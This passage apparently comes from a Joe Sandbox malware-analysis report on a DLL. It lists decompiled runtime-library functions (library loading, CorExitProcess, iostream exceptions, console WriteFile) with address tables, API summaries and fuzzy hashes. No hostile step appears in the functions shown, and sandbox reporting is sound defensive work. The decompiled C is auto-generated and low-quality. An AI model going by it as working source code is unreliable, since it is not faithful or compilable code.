					_t11 =  *_t26;
					_t22 = 0x6dad556c + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x6daa59c8 + _t11 * 4);
						_v8 = _t12;
						_t29 = LoadLibraryExW(_t12, 0, 0x800);
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E6DA92838(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}













              0x6da8d519
              0x6da8d58d
              0x6da8d51e
              0x6da8d520
              0x6da8d527
              0x6da8d52b
              0x6da8d534
              0x6da8d543
              0x6da8d54c
              0x6da8d550
              0x6da8d599
              0x6da8d59b
              0x6da8d59f
              0x6da8d5a2
              0x6da8d5a2
              0x6da8d5a8
              0x6da8d5a8
              0x6da8d594
              0x6da8d598
              0x6da8d598
              0x6da8d552
              0x6da8d55b
              0x6da8d585
              0x6da8d588
              0x6da8d58a
              0x6da8d58a
              0x00000000
              0x6da8d58a
              0x6da8d55d
              0x6da8d568
              0x6da8d56d
              0x6da8d572
              0x00000000
              0x00000000
              0x6da8d579
              0x6da8d57f
              0x6da8d583
              0x00000000
              0x00000000
              0x00000000
              0x6da8d583
              0x6da8d530
              0x00000000
              0x00000000
              0x00000000
              0x6da8d532
              0x6da8d592
              0x00000000

              APIs
              • FreeLibrary.KERNEL32(00000000,?,?,6DA8D5D3,00000000,?,00000001,00000000,?,6DA8D64A,00000001,FlsFree,6DAA5A84,FlsFree,00000000), ref: 6DA8D5A2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: FreeLibrary
              • String ID: api-ms-
              • API String ID: 3664257935-2084034818
              • Opcode ID: d1c23616f97ae127d95d058874ea602a499bd250735c09257c1cb88cc82f34bb
              • Instruction ID: 5f8db22247b7e85f3db94018499d68347ca0c45771972c65ba44296335759363
              • Opcode Fuzzy Hash: d1c23616f97ae127d95d058874ea602a499bd250735c09257c1cb88cc82f34bb
              • Instruction Fuzzy Hash: 32110435A0C722AFCF128A18D80071E33B4AF46734F194213FD14AB181DBB0E981CBD5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA91632 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 25%
              			E6DA91632(intOrPtr _a4) {
				char _v16;
				signed int _v20;
				signed int _t11;
				int _t14;
				void* _t16;
				void* _t20;
				int _t22;
				signed int _t23;

				_t11 =  *0x6dab3014; // 0x6c4e8ceb
				 *[fs:0x0] =  &_v16;
				_v20 = _v20 & 0x00000000;
				_t14 =  &_v20;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t14, _t11 ^ _t23, _t20, _t16,  *[fs:0x0], E6DAA277B, 0xffffffff);
				if(_t14 != 0) {
					_t14 = GetProcAddress(_v20, "CorExitProcess");
					_t22 = _t14;
					if(_t22 != 0) {
						 *0x6daa415c(_a4);
						_t14 =  *_t22();
					}
				}
				if(_v20 != 0) {
					_t14 = FreeLibrary(_v20);
				}
				 *[fs:0x0] = _v16;
				return _t14;
			}











              0x6da91647
              0x6da91652
              0x6da91658
              0x6da9165c
              0x6da91667
              0x6da9166f
              0x6da91679
              0x6da9167f
              0x6da91683
              0x6da9168a
              0x6da91690
              0x6da91690
              0x6da91683
              0x6da91696
              0x6da9169b
              0x6da9169b
              0x6da916a4
              0x6da916ae

              APIs
              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,6C4E8CEB,?,?,00000000,6DAA277B,000000FF,?,6DA915C2,?,?,6DA91596,00000016), ref: 6DA91667
              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6DA91679
              • FreeLibrary.KERNEL32(00000000,?,00000000,6DAA277B,000000FF,?,6DA915C2,?,?,6DA91596,00000016), ref: 6DA9169B
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: AddressFreeHandleLibraryModuleProc
              • String ID: CorExitProcess$mscoree.dll
              • API String ID: 4061214504-1276376045
              • Opcode ID: 7651b4ba821510852ec587b69ad0f2818c389f6e8443b938602a8275a797d7eb
              • Instruction ID: e1bfd3097dbc77bc9ca7ba791abfc16ca58b861dea90f5139e9be25cff62a7da
              • Opcode Fuzzy Hash: 7651b4ba821510852ec587b69ad0f2818c389f6e8443b938602a8275a797d7eb
              • Instruction Fuzzy Hash: F8016735918A26AFDF118F54CC14FBE7BF8FB05714F088629F926A2290DB789941DB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA974B4 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
              Download Yara Rule
              C-Code - Quality: 60%
              			E6DA974B4(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				intOrPtr _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				intOrPtr _t46;
				signed int _t49;
				void* _t52;
				signed int _t56;
				intOrPtr _t65;
				intOrPtr _t70;
				intOrPtr _t71;
				intOrPtr _t73;
				void* _t74;
				intOrPtr _t75;
				void* _t92;
				intOrPtr* _t93;
				void* _t95;
				intOrPtr* _t96;
				intOrPtr* _t98;
				signed int _t99;
				void* _t100;
				intOrPtr* _t101;
				intOrPtr* _t103;
				void* _t106;

				_push(__ecx);
				_push(__ecx);
				_t41 =  *0x6dab3014; // 0x6c4e8ceb
				_v8 = _t41 ^ _t99;
				_t73 = _a20;
				if(_t73 > 0) {
					_t71 = E6DA90C3D(_a16, _t73);
					_t106 = _t71 - _t73;
					_t4 = _t71 + 1; // 0x1
					_t73 = _t4;
					if(_t106 >= 0) {
						_t73 = _t71;
					}
				}
				_t77 = _a32;
				if(_a32 == 0) {
					_t70 =  *((intOrPtr*)( *_a4 + 8));
					_t77 = _t70;
					_a32 = _t70;
				}
				_t46 = E6DA98F05(_t77, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t73, 0, 0);
				_t101 = _t100 + 0x18;
				_v12 = _t46;
				if(_t46 == 0) {
					L41:
					_pop(_t92);
					_pop(_t95);
					_pop(_t74);
					return E6DA89B91(_t46, _t74, _v8 ^ _t99, 0x400, _t92, _t95);
				} else {
					_t16 = _t46 + _t46 + 8; // 0x8
					asm("sbb eax, eax");
					_t49 = _t46 + _t46 & _t16;
					if(_t49 == 0) {
						_t96 = 0;
						L39:
						_t75 = 0;
						L40:
						E6DA8937B(_t96);
						_t46 = _t75;
						goto L41;
					}
					if(_t49 > 0x400) {
						_t93 = E6DA9458B(_t49);
						if(_t93 == 0) {
							L13:
							_t96 = _t93;
							if(_t93 == 0) {
								goto L39;
							}
							_t52 = E6DA98F05(_a32, 1, _a16, _t73, _t93, _v12);
							_t103 = _t101 + 0x18;
							if(_t52 == 0) {
								goto L39;
							}
							_t97 = _v12;
							_t75 = E6DA9694F(_a8, _a12, _t93, _v12, 0, 0, 0, 0, 0);
							if(_t75 == 0) {
								L19:
								_t96 = _t93;
								goto L39;
							}
							if((_a12 & 0x00000400) == 0) {
								_t31 = _t75 + _t75 + 8; // 0x8
								asm("sbb eax, eax");
								_t56 = _t75 + _t75 & _t31;
								if(_t56 == 0) {
									_t98 = 0;
									L37:
									E6DA8937B(_t98);
									goto L19;
								}
								if(_t56 > 0x400) {
									_t98 = E6DA9458B(_t56);
									if(_t98 == 0) {
										goto L37;
									}
									 *_t98 = 0xdddd;
									L28:
									_t98 = _t98 + 8;
									if(_t98 == 0 || E6DA9694F(_a8, _a12, _t93, _v12, _t98, _t75, 0, 0, 0) == 0) {
										goto L37;
									} else {
										_push(0);
										_push(0);
										if(_a28 != 0) {
											_push(_a28);
											_push(_a24);
										} else {
											_push(0);
											_push(0);
										}
										_push(_t75);
										_push(_t98);
										_push(0);
										_push(_a32);
										_t75 = E6DA98F81();
										if(_t75 == 0) {
											goto L37;
										} else {
											E6DA8937B(_t98);
											L34:
											_t96 = _t93;
											goto L40;
										}
									}
								}
								E6DA89C20(_t56);
								_t98 = _t103;
								if(_t98 == 0) {
									goto L37;
								}
								 *_t98 = 0xcccc;
								goto L28;
							}
							_t65 = _a28;
							if(_t65 == 0) {
								goto L34;
							}
							if(_t75 <= _t65) {
								_t75 = E6DA9694F(_a8, _a12, _t93, _t97, _a24, _t65, 0, 0, 0);
								if(_t75 != 0) {
									goto L34;
								}
							}
							goto L19;
						}
						 *_t93 = 0xdddd;
						L12:
						_t93 = _t93 + 8;
						goto L13;
					}
					E6DA89C20(_t49);
					_t93 = _t101;
					if(_t93 == 0) {
						goto L13;
					}
					 *_t93 = 0xcccc;
					goto L12;
				}
			}






























              0x6da974b9
              0x6da974ba
              0x6da974bb
              0x6da974c2
              0x6da974c6
              0x6da974cd
              0x6da974d3
              0x6da974d9
              0x6da974dc
              0x6da974dc
              0x6da974df
              0x6da974e1
              0x6da974e1
              0x6da974df
              0x6da974e3
              0x6da974e8
              0x6da974ef
              0x6da974f2
              0x6da974f4
              0x6da974f4
              0x6da97510
              0x6da97515
              0x6da97518
              0x6da9751d
              0x6da97690
              0x6da97693
              0x6da97694
              0x6da97695
              0x6da976a1
              0x6da97523
              0x6da97525
              0x6da9752a
              0x6da9752c
              0x6da9752e
              0x6da97683
              0x6da97685
              0x6da97685
              0x6da97687
              0x6da97688
              0x6da9768e
              0x00000000
              0x6da9768e
              0x6da97539
              0x6da97554
              0x6da97559
              0x6da97564
              0x6da97564
              0x6da97568
              0x00000000
              0x00000000
              0x6da9757b
              0x6da97580
              0x6da97585
              0x00000000
              0x00000000
              0x6da9758b
              0x6da975a2
              0x6da975a6
              0x6da975c1
              0x6da975c1
              0x00000000
              0x6da975c1
              0x6da975b0
              0x6da975ed
              0x6da975f2
              0x6da975f4
              0x6da975f6
              0x6da97675
              0x6da97677
              0x6da97678
              0x00000000
              0x6da9767d
              0x6da975fa
              0x6da97615
              0x6da9761a
              0x00000000
              0x00000000
              0x6da9761c
              0x6da97622
              0x6da97622
              0x6da97627
              0x00000000
              0x6da97643
              0x6da97645
              0x6da97646
              0x6da9764a
              0x6da9766d
              0x6da97670
              0x6da9764c
              0x6da9764c
              0x6da9764d
              0x6da9764d
              0x6da9764e
              0x6da9764f
              0x6da97650
              0x6da97651
              0x6da97659
              0x6da97660
              0x00000000
              0x6da97662
              0x6da97663
              0x6da97669
              0x6da97669
              0x00000000
              0x6da97669
              0x6da97660
              0x6da97627
              0x6da975fc
              0x6da97601
              0x6da97605
              0x00000000
              0x00000000
              0x6da97607
              0x00000000
              0x6da97607
              0x6da975b2
              0x6da975b7
              0x00000000
              0x00000000
              0x6da975bf
              0x6da975de
              0x6da975e2
              0x00000000
              0x00000000
              0x6da975e8
              0x00000000
              0x6da975bf
              0x6da9755b
              0x6da97561
              0x6da97561
              0x00000000
              0x6da97561
              0x6da9753b
              0x6da97540
              0x6da97544
              0x00000000
              0x00000000
              0x6da97546
              0x00000000
              0x6da97546

              APIs
              • __alloca_probe_16.LIBCMT ref: 6DA9753B
              • __alloca_probe_16.LIBCMT ref: 6DA975FC
              • __freea.LIBCMT ref: 6DA97663
                • Part of subcall function 6DA9458B: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 6DA945BD
              • __freea.LIBCMT ref: 6DA97678
              • __freea.LIBCMT ref: 6DA97688
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: __freea$__alloca_probe_16$AllocateHeap
              • String ID:
              • API String ID: 1423051803-0
              • Opcode ID: 21054bad0b019baf278c25f1505abf53a85cb1192e725219dcd1f11a992d80e2
              • Instruction ID: c3990e0584ed964756b8f4f5c62e4e693512c7a4c58417d5accc161b3057ffc9
              • Opcode Fuzzy Hash: 21054bad0b019baf278c25f1505abf53a85cb1192e725219dcd1f11a992d80e2
              • Instruction Fuzzy Hash: DA518376A2C2176FEF118FA88D40EBB36E9EF45654F1A4128FE14DE250E771CC9186B0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA82D40 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON
              Download Yara Rule
              C-Code - Quality: 86%
              			E6DA82D40(void* __ebx, void* __ecx, signed int _a4, char _a8) {
				char _v24;
				char _v32;
				intOrPtr _v48;
				signed int _t20;
				void* _t22;
				void* _t32;
				signed char _t35;
				intOrPtr* _t37;
				char* _t40;
				intOrPtr* _t42;
				intOrPtr _t45;

				_t32 = __ebx;
				_t20 = _a4 & 0x00000017;
				 *(__ecx + 0xc) = _t20;
				_t35 =  *(__ecx + 0x10) & _t20;
				if(_t35 == 0) {
					return _t20;
				} else {
					if(_a8 != 0) {
						E6DA8AA9D(0, 0);
					}
					if((_t35 & 0x00000004) == 0) {
						_t40 =  ==  ? "ios_base::eofbit set" : "ios_base::failbit set";
					} else {
						_t40 = "ios_base::badbit set";
					}
					_t22 = E6DA825A0( &_v32);
					_t37 =  &_v24;
					E6DA82C70(_t32, _t37, _t40, _t22);
					E6DA8AA9D( &_v32, 0x6dab17a0);
					asm("int3");
					_t45 = _v48;
					asm("xorps xmm0, xmm0");
					_t42 = _t37;
					 *_t42 = 0x6daa4214;
					asm("movq [eax], xmm0");
					_t14 = _t45 + 4; // 0x4
					E6DA8A701(_t14, _t42 + 4);
					 *_t42 = 0x6daaf434;
					 *((intOrPtr*)(_t42 + 0xc)) =  *((intOrPtr*)(_t45 + 0xc));
					 *((intOrPtr*)(_t42 + 0x10)) =  *((intOrPtr*)(_t45 + 0x10));
					 *_t42 = 0x6daaf45c;
					return _t42;
				}
			}














              0x6da82d40
              0x6da82d4c
              0x6da82d4f
              0x6da82d55
              0x6da82d57
              0x6da82d64
              0x6da82d59
              0x6da82d5d
              0x6da82d6b
              0x6da82d6b
              0x6da82d73
              0x6da82d89
              0x6da82d75
              0x6da82d75
              0x6da82d75
              0x6da82d90
              0x6da82d97
              0x6da82d9b
              0x6da82daa
              0x6da82daf
              0x6da82db4
              0x6da82db7
              0x6da82dbb
              0x6da82dc1
              0x6da82dc7
              0x6da82dcb
              0x6da82dcf
              0x6da82dd4
              0x6da82de3
              0x6da82de8
              0x6da82deb
              0x6da82df4
              0x6da82df4

              APIs
              • ___std_exception_copy.LIBVCRUNTIME ref: 6DA82DCF
                • Part of subcall function 6DA8AA9D: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,6DA88868,?,6DAB0F8C,0000001D,WIPTsfDddTRsYDKObDdZHPEivdAcq,0000001D), ref: 6DA8AAFD
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: ExceptionRaise___std_exception_copy
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 3109751735-1866435925
              • Opcode ID: 24f4e300eff45bed9b588072df1a4168bd1710bf3a5cefe4a13a60437729c60e
              • Instruction ID: 8a843641e7d284fcac228aa9e7b56d39ad65b5b1d836ee6838e44b31d5541755
              • Opcode Fuzzy Hash: 24f4e300eff45bed9b588072df1a4168bd1710bf3a5cefe4a13a60437729c60e
              • Instruction Fuzzy Hash: 561106B251C7056FC714CF68C801BA6B7E8BF41210F18C61AFD658B682EB30E8D4CB61
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA9FB75 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 78%
              			E6DA9FB75(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v16;
				signed int _v20;
				char _v28;
				char _v35;
				signed char _v36;
				void _v44;
				long _v48;
				signed char* _v52;
				char _v53;
				long _v60;
				intOrPtr _v64;
				struct _OVERLAPPED* _v68;
				signed int _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				void _v92;
				long _v96;
				signed char* _v100;
				void* _v104;
				intOrPtr _v108;
				char _v112;
				int _v116;
				struct _OVERLAPPED* _v120;
				struct _OVERLAPPED* _v124;
				struct _OVERLAPPED* _v128;
				struct _OVERLAPPED* _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t178;
				signed int _t180;
				int _t186;
				signed char* _t190;
				signed char _t195;
				intOrPtr _t198;
				void* _t200;
				signed char* _t201;
				long _t205;
				intOrPtr _t210;
				void _t212;
				signed char* _t217;
				void* _t224;
				char _t227;
				struct _OVERLAPPED* _t229;
				void* _t238;
				signed int _t240;
				signed char* _t243;
				long _t246;
				intOrPtr _t247;
				signed char* _t248;
				void* _t258;
				intOrPtr _t265;
				void* _t266;
				struct _OVERLAPPED* _t267;
				signed int _t268;
				signed int _t273;
				intOrPtr* _t279;
				signed int _t281;
				signed int _t285;
				signed char _t286;
				long _t287;
				signed int _t291;
				signed char* _t292;
				struct _OVERLAPPED* _t296;
				void* _t299;
				signed int _t300;
				signed int _t302;
				struct _OVERLAPPED* _t303;
				signed char* _t306;
				intOrPtr* _t307;
				void* _t308;
				signed int _t309;
				long _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				void* _t314;
				void* _t315;
				void* _t316;

				_push(0xffffffff);
				_push(E6DAA2846);
				_push( *[fs:0x0]);
				_t315 = _t314 - 0x74;
				_t177 =  *0x6dab3014; // 0x6c4e8ceb
				_t178 = _t177 ^ _t313;
				_v20 = _t178;
				_push(_t178);
				 *[fs:0x0] =  &_v16;
				_t180 = _a8;
				_t306 = _a12;
				_t265 = _a20;
				_t268 = (_t180 & 0x0000003f) * 0x38;
				_t291 = _t180 >> 6;
				_v100 = _t306;
				_v64 = _t265;
				_v84 = _t291;
				_v72 = _t268;
				_v104 =  *((intOrPtr*)( *((intOrPtr*)(0x6dad5858 + _t291 * 4)) + _t268 + 0x18));
				_v88 = _a16 + _t306;
				_t186 = GetConsoleOutputCP();
				_t317 =  *((char*)(_t265 + 0x14));
				_v116 = _t186;
				if( *((char*)(_t265 + 0x14)) == 0) {
					E6DA8F860(_t265, _t291, _t317);
				}
				_t307 = _a4;
				_v108 =  *((intOrPtr*)( *((intOrPtr*)(_t265 + 0xc)) + 8));
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t190 = _v100;
				_t292 = _t190;
				_v52 = _t292;
				if(_t190 < _v88) {
					_t300 = _v72;
					_t267 = 0;
					_v76 = 0;
					do {
						_v53 =  *_t292;
						_v68 = _t267;
						_v48 = 1;
						_t273 =  *(0x6dad5858 + _v84 * 4);
						_v80 = _t273;
						if(_v108 != 0xfde9) {
							_t195 =  *((intOrPtr*)(_t300 + _t273 + 0x2d));
							__eflags = _t195 & 0x00000004;
							if((_t195 & 0x00000004) == 0) {
								_t273 =  *_t292 & 0x000000ff;
								_t198 =  *((intOrPtr*)( *((intOrPtr*)(_v64 + 0xc))));
								__eflags =  *((intOrPtr*)(_t198 + _t273 * 2)) - _t267;
								if( *((intOrPtr*)(_t198 + _t273 * 2)) >= _t267) {
									_push(_v64);
									_push(1);
									_push(_t292);
									goto L29;
								} else {
									_t217 =  &(_t292[1]);
									_v60 = _t217;
									__eflags = _t217 - _v88;
									if(_t217 >= _v88) {
										 *((char*)(_t300 + _v80 + 0x2e)) =  *_t292;
										 *( *(0x6dad5858 + _v84 * 4) + _t300 + 0x2d) =  *( *(0x6dad5858 + _v84 * 4) + _t300 + 0x2d) | 0x00000004;
										 *((intOrPtr*)(_t307 + 4)) = _v76 + 1;
									} else {
										_t224 = E6DA954AB(_t273, _t292,  &_v68, _t292, 2, _v64);
										_t316 = _t315 + 0x10;
										__eflags = _t224 - 0xffffffff;
										if(_t224 != 0xffffffff) {
											_t201 = _v60;
											goto L31;
										}
									}
								}
							} else {
								_push(_v64);
								_v36 =  *(_t300 + _t273 + 0x2e) & 0x000000fb;
								_t227 =  *_t292;
								_v35 = _t227;
								 *((char*)(_t300 + _t273 + 0x2d)) = _t227;
								_push(2);
								_push( &_v36);
								L29:
								_push( &_v68);
								_t200 = E6DA954AB(_t273, _t292);
								_t316 = _t315 + 0x10;
								__eflags = _t200 - 0xffffffff;
								if(_t200 != 0xffffffff) {
									_t201 = _v52;
									goto L31;
								}
							}
						} else {
							_t229 = _t267;
							_t279 = _t273 + 0x2e + _t300;
							while( *_t279 != _t267) {
								_t229 =  &(_t229->Internal);
								_t279 = _t279 + 1;
								if(_t229 < 5) {
									continue;
								}
								break;
							}
							_t302 = _v88 - _t292;
							_v48 = _t229;
							if(_t229 == 0) {
								_t73 = ( *_t292 & 0x000000ff) + 0x6dab3900; // 0x0
								_t281 =  *_t73 + 1;
								_v80 = _t281;
								__eflags = _t281 - _t302;
								if(_t281 > _t302) {
									__eflags = _t302;
									if(_t302 <= 0) {
										goto L44;
									} else {
										_t309 = _v72;
										do {
											 *((char*)( *(0x6dad5858 + _v84 * 4) + _t309 + _t267 + 0x2e)) =  *((intOrPtr*)(_t267 + _t292));
											_t267 =  &(_t267->Internal);
											__eflags = _t267 - _t302;
										} while (_t267 < _t302);
										goto L43;
									}
									L52:
								} else {
									_v132 = _t267;
									__eflags = _t281 - 4;
									_v128 = _t267;
									_v60 = _t292;
									_v48 = (_t281 == 4) + 1;
									_t238 = E6DA9E2DE( &_v132,  &_v68,  &_v60, (_t281 == 4) + 1,  &_v132, _v64);
									_t316 = _t315 + 0x14;
									__eflags = _t238 - 0xffffffff;
									if(_t238 != 0xffffffff) {
										_t240 =  &(_v52[_v80]);
										__eflags = _t240;
										_t300 = _v72;
										goto L21;
									}
								}
							} else {
								_t285 = _v72;
								_t243 = _v80 + 0x2e + _t285;
								_v80 = _t243;
								_t246 =  *((char*)(( *_t243 & 0x000000ff) + 0x6dab3900)) + 1;
								_v60 = _t246;
								_t247 = _t246 - _v48;
								_v76 = _t247;
								if(_t247 > _t302) {
									__eflags = _t302;
									if(_t302 > 0) {
										_t248 = _v52;
										_t310 = _v48;
										do {
											_t286 =  *((intOrPtr*)(_t267 + _t248));
											_t292 =  *(0x6dad5858 + _v84 * 4) + _t285 + _t267;
											_t267 =  &(_t267->Internal);
											_t292[_t310 + 0x2e] = _t286;
											_t285 = _v72;
											__eflags = _t267 - _t302;
										} while (_t267 < _t302);
										L43:
										_t307 = _a4;
									}
									L44:
									 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + _t302;
								} else {
									_t287 = _v48;
									_t303 = _t267;
									_t311 = _v80;
									do {
										 *((char*)(_t313 + _t303 - 0x18)) =  *_t311;
										_t303 =  &(_t303->Internal);
										_t311 = _t311 + 1;
									} while (_t303 < _t287);
									_t304 = _v76;
									if(_v76 > 0) {
										E6DA8AB10( &_v28 + _t287, _t292, _t304);
										_t287 = _v48;
										_t315 = _t315 + 0xc;
									}
									_t300 = _v72;
									_t296 = _t267;
									_t312 = _v84;
									do {
										 *( *((intOrPtr*)(0x6dad5858 + _t312 * 4)) + _t300 + _t296 + 0x2e) = _t267;
										_t296 =  &(_t296->Internal);
									} while (_t296 < _t287);
									_t307 = _a4;
									_v112 =  &_v28;
									_v124 = _t267;
									_v120 = _t267;
									_v48 = (_v60 == 4) + 1;
									_t258 = E6DA9E2DE( &_v124,  &_v68,  &_v112, (_v60 == 4) + 1,  &_v124, _v64);
									_t316 = _t315 + 0x14;
									if(_t258 != 0xffffffff) {
										_t240 =  &(_v52[_v76]);
										L21:
										_t201 = _t240 - 1;
										L31:
										_v52 = _t201 + 1;
										_t205 = E6DA98F81(_v116, _t267,  &_v68, _v48,  &_v44, 5, _t267, _t267);
										_t315 = _t316 + 0x20;
										_v60 = _t205;
										if(_t205 != 0) {
											if(WriteFile(_v104,  &_v44, _t205,  &_v96, _t267) == 0) {
												L50:
												 *_t307 = GetLastError();
											} else {
												_t292 = _v52;
												_t210 =  *((intOrPtr*)(_t307 + 8)) + _t292 - _v100;
												_v76 = _t210;
												 *((intOrPtr*)(_t307 + 4)) = _t210;
												if(_v96 >= _v60) {
													if(_v53 != 0xa) {
														goto L38;
													} else {
														_t212 = 0xd;
														_v92 = _t212;
														if(WriteFile(_v104,  &_v92, 1,  &_v96, _t267) == 0) {
															goto L50;
														} else {
															if(_v96 >= 1) {
																 *((intOrPtr*)(_t307 + 8)) =  *((intOrPtr*)(_t307 + 8)) + 1;
																 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + 1;
																_t292 = _v52;
																_v76 =  *((intOrPtr*)(_t307 + 4));
																goto L38;
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L51;
						L38:
					} while (_t292 < _v88);
				}
				L51:
				 *[fs:0x0] = _v16;
				_pop(_t299);
				_pop(_t308);
				_pop(_t266);
				return E6DA89B91(_t307, _t266, _v20 ^ _t313, _t292, _t299, _t308);
				goto L52;
			}





















































































              0x6da9fb7a
              0x6da9fb7c
              0x6da9fb87
              0x6da9fb88
              0x6da9fb8b
              0x6da9fb90
              0x6da9fb92
              0x6da9fb98
              0x6da9fb9c
              0x6da9fba2
              0x6da9fba7
              0x6da9fbad
              0x6da9fbb0
              0x6da9fbb3
              0x6da9fbb6
              0x6da9fbb9
              0x6da9fbbc
              0x6da9fbc6
              0x6da9fbcd
              0x6da9fbd5
              0x6da9fbd8
              0x6da9fbde
              0x6da9fbe2
              0x6da9fbe5
              0x6da9fbe9
              0x6da9fbe9
              0x6da9fbf1
              0x6da9fbf9
              0x6da9fbfe
              0x6da9fbff
              0x6da9fc00
              0x6da9fc01
              0x6da9fc04
              0x6da9fc06
              0x6da9fc0c
              0x6da9fc12
              0x6da9fc15
              0x6da9fc17
              0x6da9fc1a
              0x6da9fc23
              0x6da9fc29
              0x6da9fc2c
              0x6da9fc33
              0x6da9fc3a
              0x6da9fc3d
              0x6da9fd77
              0x6da9fd7b
              0x6da9fd7e
              0x6da9fda1
              0x6da9fda7
              0x6da9fda9
              0x6da9fdad
              0x6da9fdde
